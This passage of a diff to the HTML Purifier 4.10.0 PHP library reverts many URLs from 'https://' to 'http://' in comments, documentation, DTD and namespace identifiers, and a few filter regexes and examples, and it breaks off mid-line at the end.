+++ b/htmlpurifier-4.10.0/docs/specimens/windows-live-mail-desktop-beta.html @@ -12,7 +12,7 @@ name="Compose message area" acc_role="text" CanvasTabStop="false"> style="BORDER-TOP: #dddddd 1px solid; FONT-SIZE: 10pt; WIDTH: 100%; MARGIN-RIGHT: 10px; PADDING-TOP: 5px; BORDER-BOTTOM: #dddddd 1px solid; FONT-FAMILY: Verdana; HEIGHT: 25px; BACKGROUND-COLOR: #ffffff"><NOBR><SPAN title="View a slideshow of the pictures in this e-mail message." style="PADDING-RIGHT: 20px"><A style="COLOR: #0088e4" -href="https://g.msn.com/5meen_us/171?path=/photomail/{6fc0065f-ffdd-4ca6-9a4c-cc5a93dc122f}&image=47D7B182CFEFB10!127&imagehi=47D7B182CFEFB10!125&CID=323550092004883216">Play +href="http://g.msn.com/5meen_us/171?path=/photomail/{6fc0065f-ffdd-4ca6-9a4c-cc5a93dc122f}&image=47D7B182CFEFB10!127&imagehi=47D7B182CFEFB10!125&CID=323550092004883216">Play slideshow </A></SPAN><SPAN style="COLOR: #909090"><SPAN>|</SPAN><SPAN style="PADDING-LEFT: 20px"> Download the highest quality version of a picture by clicking the + above it </SPAN></SPAN></NOBR></DIV> @@ -29,9 +29,9 @@ style="PADDING-RIGHT: 5px; PADDING-LEFT: 7px; PADDING-BOTTOM: 2px; WIDTH: 100%; <UL> <LI>Buletets <LI> - <DIV align=justify><A title=https://laacz.lv/blog/ - href="https://laacz.lv/blog/">https://laacz.lv/blog/</A> un <A - title=https://google.com/ href="https://google.com/">gugle</A></DIV> + <DIV align=justify><A title=http://laacz.lv/blog/ + href="http://laacz.lv/blog/">http://laacz.lv/blog/</A> un <A + title=http://google.com/ href="http://google.com/">gugle</A></DIV> <LI>Sarakstucitis</LI></UL></DIV><SPAN><SPAN xmlns:canvas="canvas-namespace-id" layoutEmptyTextWellFont="Tahoma"><SPAN style="MARGIN-BOTTOM: 15px; OVERFLOW: visible; HEIGHT: 16px"></SPAN><SPAN @@ -46,11 +46,11 @@ style="MARGIN-BOTTOM: 25px; VERTICAL-ALIGN: top; OVERFLOW: visible; MARGIN-RIGHT id=HiresARef title="Click here to view or download a high resolution version of this picture" style="COLOR: #0088e4; TEXT-DECORATION: none" - href="https://byfiles.storage.msn.com/x1pMvt0I80jTgT6DuaCpEMbprX3nk3jNv_vjigxV_EYVSMyM_PKgEvDEUtuNhQC-F-23mTTcKyqx6eGaeK2e_wMJ0ikwpDdFntk4SY7pfJUv2g2Ck6R2S2vAA?download">+</A></DIV> + href="http://byfiles.storage.msn.com/x1pMvt0I80jTgT6DuaCpEMbprX3nk3jNv_vjigxV_EYVSMyM_PKgEvDEUtuNhQC-F-23mTTcKyqx6eGaeK2e_wMJ0ikwpDdFntk4SY7pfJUv2g2Ck6R2S2vAA?download">+</A></DIV> <DIV title="Click here to view the full image using the online photo viewer." style="DISPLAY: inline; OVERFLOW: hidden; WIDTH: 140px; HEIGHT: 140px"><A - href="https://g.msn.com/5meen_us/171?path=/photomail/{6fc0065f-ffdd-4ca6-9a4c-cc5a93dc122f}&image=47D7B182CFEFB10!127&imagehi=47D7B182CFEFB10!125&CID=323550092004883216" + href="http://g.msn.com/5meen_us/171?path=/photomail/{6fc0065f-ffdd-4ca6-9a4c-cc5a93dc122f}&image=47D7B182CFEFB10!127&imagehi=47D7B182CFEFB10!125&CID=323550092004883216" border="0"><IMG style="MARGIN-TOP: 15px; DISPLAY: inline-block; MARGIN-LEFT: 0px" height=109 src="cid:006A71303B80404E9FB6184E55D6A446@wc" width=140 @@ -70,5 +70,5 @@ style="PADDING-RIGHT: 5px; PADDING-LEFT: 7px; PADDING-BOTTOM: 2px; WIDTH: 100%; style="BORDER-TOP: #dddddd 1px solid; FONT-SIZE: 10pt; MARGIN-BOTTOM: 10px; WIDTH: 100%; COLOR: #909090; MARGIN-RIGHT: 10px; PADDING-TOP: 9px; FONT-FAMILY: Verdana; HEIGHT: 42px; BACKGROUND-COLOR: #ffffff"><NOBR><SPAN title="Join Windows Live to share photos using Windows Live Photo E-mail.">Online pictures are available for 30 days. <A style="COLOR: #0088e4" -href="https://g.msn.com/5meen_us/175">Get Windows Live Mail desktop to create +href="http://g.msn.com/5meen_us/175">Get Windows Live Mail desktop to create your own photo e-mails. </A></SPAN></NOBR></DIV></BODY></HTML> diff --git a/htmlpurifier-4.10.0/extras/FSTools.php b/htmlpurifier-4.10.0/extras/FSTools.php index 4ba029f..7fc4276 100755 --- a/htmlpurifier-4.10.0/extras/FSTools.php +++ b/htmlpurifier-4.10.0/extras/FSTools.php @@ -58,7 +58,7 @@ class FSTools /** * Copy a file, or recursively copy a folder and its contents; modified * so that copied files, if PHP, have includes removed - * @note Adapted from https://aidanlister.com/repos/v/function.copyr.php + * @note Adapted from http://aidanlister.com/repos/v/function.copyr.php */ public function copyr($source, $dest) { @@ -103,7 +103,7 @@ class FSTools /** * Delete a file, or a folder and its contents - * @note Adapted from https://aidanlister.com/repos/v/function.rmdirr.php + * @note Adapted from http://aidanlister.com/repos/v/function.rmdirr.php */ public function rmdirr($dirname) { diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef.php b/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef.php index 1e9b54c..3e30d1e 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef.php @@ -40,7 +40,7 @@ abstract class HTMLPurifier_AttrDef * Convenience method that parses a string as if it were CDATA. * * This method process a string in the manner specified at - * <https://www.w3.org/TR/html4/types.html#h-6.2> by removing + * <http://www.w3.org/TR/html4/types.html#h-6.2> by removing * leading and trailing whitespace, ignoring line feeds, and replacing * carriage returns and tabs with spaces. While most useful for HTML * attributes specified as CDATA, it can also be applied to most CSS diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/CSS/FontFamily.php b/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/CSS/FontFamily.php index 44b255d..f9af36d 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/CSS/FontFamily.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/CSS/FontFamily.php @@ -127,11 +127,11 @@ class HTMLPurifier_AttrDef_CSS_FontFamily extends HTMLPurifier_AttrDef // show up in non-Western pages and are supported by most // major browsers, for example: "MS 明朝" is a // legitimate font-name - // <https://ja.wikipedia.org/wiki/MS_明朝>. See + // <http://ja.wikipedia.org/wiki/MS_明朝>. See // the CSS3 spec for more examples: - // <https://www.w3.org/TR/2011/WD-css3-fonts-20110324/localizedfamilynames.png> + // <http://www.w3.org/TR/2011/WD-css3-fonts-20110324/localizedfamilynames.png> // You can see live samples of these on the Internet: - // <https://www.google.co.jp/search?q=font-family+MS+明朝|ゴシック> + // <http://www.google.co.jp/search?q=font-family+MS+明朝|ゴシック> // However, most of these fonts have ASCII equivalents: // for example, 'MS Mincho', and it's considered // professional to use ASCII font names instead of diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/CSS/URI.php b/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/CSS/URI.php index fb4beab..3d18b32 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/CSS/URI.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/CSS/URI.php @@ -1,7 +1,7 @@ <?php /** - * Validates a URI in CSS syntax, which uses url('https://example.com') + * Validates a URI in CSS syntax, which uses url('http://example.com') * @note While theoretically speaking a URI in a CSS document could * be non-embedded, as of CSS2 there is no such usage so we're * generalizing it. This may need to be changed in the future. diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/HTML/Pixels.php b/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/HTML/Pixels.php index 60efa5c..1a68f23 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/HTML/Pixels.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/HTML/Pixels.php @@ -48,7 +48,7 @@ class HTMLPurifier_AttrDef_HTML_Pixels extends HTMLPurifier_AttrDef } // upper-bound value, extremely high values can - // crash operating systems, see <https://ha.ckers.org/imagecrash.html> + // crash operating systems, see <http://ha.ckers.org/imagecrash.html> // WARNING, above link WILL crash you if you're using Windows if ($this->max !== null && $int > $this->max) { diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php b/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php index 4971736..3b041ce 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php @@ -2,7 +2,7 @@ /** * Primitive email validation class based on the regexp found at - * https://www.regular-expressions.info/email.html + * http://www.regular-expressions.info/email.html */ class HTMLPurifier_AttrDef_URI_Email_SimpleCheck extends HTMLPurifier_AttrDef_URI_Email { diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/Config.php b/htmlpurifier-4.10.0/library/HTMLPurifier/Config.php index 183c28b..0d89bc2 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/Config.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/Config.php @@ -595,7 +595,7 @@ class HTMLPurifier_Config 'modify your code to use maybeGetRawDefinition, and test if the returned ' . 'value is null before making any edits (if it is null, that means that a ' . 'cached version is available, and no raw operations are necessary). See ' . - '<a href="https://htmlpurifier.org/docs/enduser-customize.html#optimized">' . + '<a href="http://htmlpurifier.org/docs/enduser-customize.html#optimized">' . 'Customize</a> for more details', E_USER_WARNING ); diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/Builder/Xml.php b/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/Builder/Xml.php index 79227fe..0d00bf1 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/Builder/Xml.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/Builder/Xml.php @@ -26,7 +26,7 @@ class HTMLPurifier_ConfigSchema_Builder_Xml extends XMLWriter $purifier = HTMLPurifier::getInstance(); $html = $purifier->purify($html); - $this->writeAttribute('xmlns', 'https://www.w3.org/1999/xhtml'); + $this->writeAttribute('xmlns', 'http://www.w3.org/1999/xhtml'); $this->writeRaw($html); $this->endElement(); // div diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.DisplayLinkURI.txt b/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.DisplayLinkURI.txt index 03d4b30..c955de7 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.DisplayLinkURI.txt +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.DisplayLinkURI.txt @@ -5,7 +5,7 @@ DEFAULT: false --DESCRIPTION-- <p> This directive turns on the in-text display of URIs in <a> tags, and disables - those links. For example, <a href="https://example.com">example</a> becomes - example (<a>https://example.com</a>). + those links. For example, <a href="http://example.com">example</a> becomes + example (<a>http://example.com</a>). </p> --# vim: et sw=4 sts=4 diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.txt b/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.txt index 02a767e..be0177d 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.txt +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.txt @@ -20,8 +20,8 @@ EXTERNAL: CSSTidy echo '<?xml version="1.0" encoding="UTF-8"?>'; ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" - "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <title>Filter.ExtractStyleBlocks</title> <?php diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/Filter.YouTube.txt b/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/Filter.YouTube.txt index 247a997..8822186 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/Filter.YouTube.txt +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/Filter.YouTube.txt @@ -10,7 +10,7 @@ DEFAULT: false </p> <p> This directive enables YouTube video embedding in HTML Purifier. Check - <a href="https://htmlpurifier.org/docs/enduser-youtube.html">this document + <a href="http://htmlpurifier.org/docs/enduser-youtube.html">this document on embedding videos</a> for more information on what this filter does. </p> --# vim: et sw=4 sts=4 diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedElements.txt b/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedElements.txt index 396a0ea..ca3c13d 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedElements.txt +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedElements.txt @@ -14,7 +14,7 @@ DEFAULT: NULL If you attempt to allow an element that HTML Purifier does not know about, HTML Purifier will raise an error. You will need to manually tell HTML Purifier about this element by using the - <a href="https://htmlpurifier.org/docs/enduser-customize.html">advanced customization features.</a> + <a href="http://htmlpurifier.org/docs/enduser-customize.html">advanced customization features.</a> </p> <p> <strong>Warning:</strong> If another directive conflicts with the diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/URI.Munge.txt b/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/URI.Munge.txt index b930fca..bedd610 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/URI.Munge.txt +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/URI.Munge.txt @@ -9,7 +9,7 @@ DEFAULT: NULL absolute URIs into another URI, usually a URI redirection service. This directive accepts a URI, formatted with a <code>%s</code> where the url-encoded original URI should be inserted (sample: - <code>https://www.google.com/url?q=%s</code>). + <code>http://www.google.com/url?q=%s</code>). </p> <p> Uses for this directive: diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/URI.SafeIframeRegexp.txt b/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/URI.SafeIframeRegexp.txt index e289805..7e1f227 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/URI.SafeIframeRegexp.txt +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/URI.SafeIframeRegexp.txt @@ -10,9 +10,9 @@ DEFAULT: NULL %HTML.SafeIframe is enabled. Here are some example values: </p> <ul> - <li><code>%^https://www.youtube.com/embed/%</code> - Allow YouTube videos</li> - <li><code>%^https://player.vimeo.com/video/%</code> - Allow Vimeo videos</li> - <li><code>%^https://(www.youtube.com/embed/|player.vimeo.com/video/)%</code> - Allow both</li> + <li><code>%^http://www.youtube.com/embed/%</code> - Allow YouTube videos</li> + <li><code>%^http://player.vimeo.com/video/%</code> - Allow Vimeo videos</li> + <li><code>%^http://(www.youtube.com/embed/|player.vimeo.com/video/)%</code> - Allow both</li> </ul> <p> Note that this directive does not give you enough granularity to, say, disable diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/Encoder.php b/htmlpurifier-4.10.0/library/HTMLPurifier/Encoder.php index 83ecdc2..ea13abc 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/Encoder.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/Encoder.php @@ -120,7 +120,7 @@ class HTMLPurifier_Encoder * UTF-8 representations. * * @note Fallback code adapted from utf8ToUnicode by Henri Sivonen and - * hsivonen@iki.fi at <https://iki.fi/hsivonen/php-utf8/> under the + * hsivonen@iki.fi at <http://iki.fi/hsivonen/php-utf8/> under the * LGPL license. Notes on what changed are inside, but in general, * the original code transformed UTF-8 text into an array of integer * Unicode codepoints. Understandably, transforming that back to @@ -289,7 +289,7 @@ class HTMLPurifier_Encoder /** * Translates a Unicode codepoint into its corresponding UTF-8 character. * @note Based on Feyd's function at - * <https://forums.devnetwork.net/viewtopic.php?p=191404#191404>, + * <http://forums.devnetwork.net/viewtopic.php?p=191404#191404>, * which is in public domain. * @note While we're going to do code point parsing anyway, a good * optimization would be to refuse to translate code points that @@ -408,7 +408,7 @@ class HTMLPurifier_Encoder } else { trigger_error( 'You have a buggy version of iconv, see https://bugs.php.net/bug.php?id=48147 ' . - 'and https://sourceware.org/bugzilla/show_bug.cgi?id=13541', + 'and http://sourceware.org/bugzilla/show_bug.cgi?id=13541', E_USER_ERROR ); } diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/EntityParser.php b/htmlpurifier-4.10.0/library/HTMLPurifier/EntityParser.php index e75751b..41059e5 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/EntityParser.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/EntityParser.php @@ -35,7 +35,7 @@ class HTMLPurifier_EntityParser public function __construct() { // From - // https://stackoverflow.com/questions/15532252/why-is-reg-being-rendered-as-without-the-bounding-semicolon + // http://stackoverflow.com/questions/15532252/why-is-reg-being-rendered-as-without-the-bounding-semicolon $semi_optional = "quot|QUOT|lt|LT|gt|GT|amp|AMP|AElig|Aacute|Acirc|Agrave|Aring|Atilde|Auml|COPY|Ccedil|ETH|Eacute|Ecirc|Egrave|Euml|Iacute|Icirc|Igrave|Iuml|Ntilde|Oacute|Ocirc|Ograve|Oslash|Otilde|Ouml|REG|THORN|Uacute|Ucirc|Ugrave|Uuml|Yacute|aacute|acirc|acute|aelig|agrave|aring|atilde|auml|brvbar|ccedil|cedil|cent|copy|curren|deg|divide|eacute|ecirc|egrave|eth|euml|frac12|frac14|frac34|iacute|icirc|iexcl|igrave|iquest|iuml|laquo|macr|micro|middot|nbsp|not|ntilde|oacute|ocirc|ograve|ordf|ordm|oslash|otilde|ouml|para|plusmn|pound|raquo|reg|sect|shy|sup1|sup2|sup3|szlig|thorn|times|uacute|ucirc|ugrave|uml|uuml|yacute|yen|yuml"; // NB: three empty captures to put the fourth match in the right diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/Filter/ExtractStyleBlocks.php b/htmlpurifier-4.10.0/library/HTMLPurifier/Filter/ExtractStyleBlocks.php index 292b8a3..5af24c2 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/Filter/ExtractStyleBlocks.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/Filter/ExtractStyleBlocks.php @@ -112,7 +112,7 @@ class HTMLPurifier_Filter_ExtractStyleBlocks extends HTMLPurifier_Filter /** * Takes CSS (the stuff found in <style>) and cleans it. - * @warning Requires CSSTidy <https://csstidy.sourceforge.net/> + * @warning Requires CSSTidy <http://csstidy.sourceforge.net/> * @param string $css CSS styling to clean * @param HTMLPurifier_Config $config * @param HTMLPurifier_Context $context diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/Filter/YouTube.php b/htmlpurifier-4.10.0/library/HTMLPurifier/Filter/YouTube.php index b26235d..b90ddf7 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/Filter/YouTube.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/Filter/YouTube.php @@ -17,7 +17,7 @@ class HTMLPurifier_Filter_YouTube extends HTMLPurifier_Filter public function preFilter($html, $config, $context) { $pre_regex = '#<object[^>]+>.+?' . - '(?:https:)?//www.youtube.com/((?:v|cp)/[A-Za-z0-9\-_=]+).+?</object>#s'; + '(?:http:)?//www.youtube.com/((?:v|cp)/[A-Za-z0-9\-_=]+).+?</object>#s'; $pre_replace = '<span class="youtube-embed">\1</span>'; return preg_replace($pre_regex, $pre_replace, $html); } diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/Generator.php b/htmlpurifier-4.10.0/library/HTMLPurifier/Generator.php index 7323e0d..addc23e 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/Generator.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/Generator.php @@ -195,7 +195,7 @@ class HTMLPurifier_Generator if (!$token instanceof HTMLPurifier_Token_Text) { return $this->generateFromToken($token); } - // Thanks <https://lachy.id.au/log/2005/05/script-comments> + // Thanks <http://lachy.id.au/log/2005/05/script-comments> $data = preg_replace('#//\s*$#', '', $token->data); return '<!--//--><![CDATA[//><!--' . "\n" . trim($data) . "\n" . '//--><!]]>'; } @@ -275,7 +275,7 @@ class HTMLPurifier_Generator public function escape($string, $quote = null) { // Workaround for APC bug on Mac Leopard reported by sidepodcast - // https://htmlpurifier.org/phorum/read.php?3,4823,4846 + // http://htmlpurifier.org/phorum/read.php?3,4823,4846 if ($quote === null) { $quote = ENT_COMPAT; } diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/HTMLModule/SafeObject.php b/htmlpurifier-4.10.0/library/HTMLPurifier/HTMLModule/SafeObject.php index 107a409..a061cec 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/HTMLModule/SafeObject.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/HTMLModule/SafeObject.php @@ -36,7 +36,7 @@ class HTMLPurifier_HTMLModule_SafeObject extends HTMLPurifier_HTMLModule 'data' => 'URI#embedded', 'codebase' => new HTMLPurifier_AttrDef_Enum( array( - 'https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0' + 'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0' ) ), ) diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/HTMLModuleManager.php b/htmlpurifier-4.10.0/library/HTMLPurifier/HTMLModuleManager.php index 3904491..7b5a878 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/HTMLModuleManager.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/HTMLModuleManager.php @@ -99,7 +99,7 @@ class HTMLPurifier_HTMLModuleManager array('Tidy_Transitional', 'Tidy_Proprietary'), array(), '-//W3C//DTD HTML 4.01 Transitional//EN', - 'https://www.w3.org/TR/html4/loose.dtd' + 'http://www.w3.org/TR/html4/loose.dtd' ); $this->doctypes->register( @@ -109,7 +109,7 @@ class HTMLPurifier_HTMLModuleManager array('Tidy_Strict', 'Tidy_Proprietary', 'Tidy_Name'), array(), '-//W3C//DTD HTML 4.01//EN', - 'https://www.w3.org/TR/html4/strict.dtd' + 'http://www.w3.org/TR/html4/strict.dtd' ); $this->doctypes->register( @@ -119,7 +119,7 @@ class HTMLPurifier_HTMLModuleManager array('Tidy_Transitional', 'Tidy_XHTML', 'Tidy_Proprietary', 'Tidy_Name'), array(), '-//W3C//DTD XHTML 1.0 Transitional//EN', - 'https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd' + 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd' ); $this->doctypes->register( @@ -129,7 +129,7 @@ class HTMLPurifier_HTMLModuleManager array('Tidy_Strict', 'Tidy_XHTML', 'Tidy_Strict', 'Tidy_Proprietary', 'Tidy_Name'), array(), '-//W3C//DTD XHTML 1.0 Strict//EN', - 'https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd' + 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd' ); $this->doctypes->register( @@ -141,7 +141,7 @@ class HTMLPurifier_HTMLModuleManager array('Tidy_Strict', 'Tidy_XHTML', 'Tidy_Proprietary', 'Tidy_Strict', 'Tidy_Name'), // Tidy_XHTML1_1 array(), '-//W3C//DTD XHTML 1.1//EN', - 'https://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd' + 'http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd' ); } diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/Lexer/PH5P.php b/htmlpurifier-4.10.0/library/HTMLPurifier/Lexer/PH5P.php index e1fdf88..6b281a5 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/Lexer/PH5P.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/Lexer/PH5P.php @@ -44,7 +44,7 @@ class HTMLPurifier_Lexer_PH5P extends HTMLPurifier_Lexer_DOMLex /* -Copyright 2007 Jeroen van der Meer <https://jero.net/> +Copyright 2007 Jeroen van der Meer <http://jero.net/> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/TagTransform/Font.php b/htmlpurifier-4.10.0/library/HTMLPurifier/TagTransform/Font.php index 655b209..2a18651 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/TagTransform/Font.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/TagTransform/Font.php @@ -9,7 +9,7 @@ * * @note Size is an interesting case because it doesn't map cleanly to CSS. * Thanks to - * https://style.cleverchimp.com/font_size_intervals/altintervals.html + * http://style.cleverchimp.com/font_size_intervals/altintervals.html * for reasonable mappings. * @warning This doesn't work completely correctly; specifically, this * TagTransform operates before well-formedness is enforced, so diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/URI.php b/htmlpurifier-4.10.0/library/HTMLPurifier/URI.php index 7346fdd..1a4705a 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/URI.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/URI.php @@ -153,7 +153,7 @@ class HTMLPurifier_URI $segments_encoder = new HTMLPurifier_PercentEncoder($chars_pchar . '/'); if (!is_null($this->host)) { // this catches $this->host === '' // path-abempty (hier and relative) - // https://www.example.com/my/path + // http://www.example.com/my/path // //www.example.com/my/path (looks odd, but works, and // recognized by most browsers) // (this set is valid or invalid on a scheme by scheme @@ -164,12 +164,12 @@ class HTMLPurifier_URI } elseif ($this->path !== '') { if ($this->path[0] === '/') { // path-absolute (hier and relative) - // https:/my/path + // http:/my/path // /my/path if (strlen($this->path) >= 2 && $this->path[1] === '/') { // This could happen if both the host gets stripped // out - // https://my/path + // http://my/path // //my/path $this->path = ''; } else { @@ -177,7 +177,7 @@ class HTMLPurifier_URI } } elseif (!is_null($this->scheme)) { // path-rootless (hier) - // https:my/path + // http:my/path // Short circuit evaluation means we don't need to check nz $this->path = $segments_encoder->encode($this->path); } else { @@ -221,8 +221,8 @@ class HTMLPurifier_URI // reconstruct authority $authority = null; // there is a rendering difference between a null authority - // (https:foo-bar) and an empty string authority - // (https:///foo-bar). + // (http:foo-bar) and an empty string authority + // (http:///foo-bar). if (!is_null($this->host)) { $authority = ''; if (!is_null($this->userinfo)) { @@ -238,7 +238,7 @@ class HTMLPurifier_URI // One might wonder about parsing quirks from browsers after // this reconstruction. Unfortunately, parsing behavior depends // on what *scheme* was employed (file:///foo is handled *very* - // differently than https:///foo), so unfortunately we have to + // differently than http:///foo), so unfortunately we have to // defer to the schemes to do the right thing. $result = ''; if (!is_null($this->scheme)) { diff --git a/htmlpurifier-4.10.0/library/HTMLPurifier/URIScheme.php b/htmlpurifier-4.10.0/library/HTMLPurifier/URIScheme.php index e6f4ef2..03602ab 100755 --- a/htmlpurifier-4.10.0/library/HTMLPurifier/URIScheme.php +++ b/htmlpurifier-4.10.0/library/HTMLPurifier/URIScheme.php @@ -72,7 +72,7 @@ abstract class HTMLPurifier_URIScheme (!is_null($uri->scheme) && ($uri->host === '' || is_null($uri->host))) || // if the scheme is not present, a *blank* host is in error, // since this translates into '///path' which most browsers - // interpret as being 'https://path'. + // interpret as being 'http://path'. (is_null($uri->scheme) && $uri->host === '') ) { do { diff --git a/htmlpurifier-4.10.0/phpdoc.ini b/htmlpurifier-4.10.0/phpdoc.ini index e9cfbcd..5ac8b21 100755 --- a/htmlpurifier-4.10.0/phpdoc.ini +++ b/htmlpurifier-4.10.0/phpdoc.ini @@ -5,7 +5,7 @@ ;; command-line switch -c, as in phpdoc -c default.ini or phpdoc -c myini.ini. The web ;; interface will automatically generate a list of .ini files that can be used. ;; -;; default.ini is used to generate the online manual at https://www.phpdoc.org/docs +;; default.ini is used to generate the online manual at http://www.phpdoc.org/docs ;; ;; ALL .ini files must be in the user subdirectory of phpDocumentor with an extension of .ini ;; diff --git a/htmlpurifier-4.10.0/plugins/modx.txt b/htmlpurifier-4.10.0/plugins/modx.txt index b6132f8..bcdd40d 100755 --- a/htmlpurifier-4.10.0/plugins/modx.txt +++ b/htmlpurifier-4.10.0/plugins/modx.txt @@ -1,10 +1,10 @@ MODx Plugin -MODx <https://www.modxcms.com/> is an open source PHP application framework. +MODx <http://www.modxcms.com/> is an open source PHP application framework. I first came across them in my referrer logs when tillda asked if anyone could implement an HTML Purifier plugin. This forum thread -<https://modxcms.com/forums/index.php/topic,6604.0.html> eventually resulted +<http://modxcms.com/forums/index.php/topic,6604.0.html> eventually resulted in the fruition of this plugin that davidm says, "is on top of my favorite list." HTML Purifier goes great with WYSIWYG editors! @@ -93,14 +93,14 @@ $purifier = new HTMLPurifier($config); 5. Known Bugs 'rn' characters sometimes mysteriously appear after purification. We are -currently investigating this issue. See: <https://htmlpurifier.org/phorum/read.php?3,1866> +currently investigating this issue. See: <http://htmlpurifier.org/phorum/read.php?3,1866> 6. See Also A modified version of Jot 1.1.3 is available, which integrates with HTML -Purifier. You can check it out here: 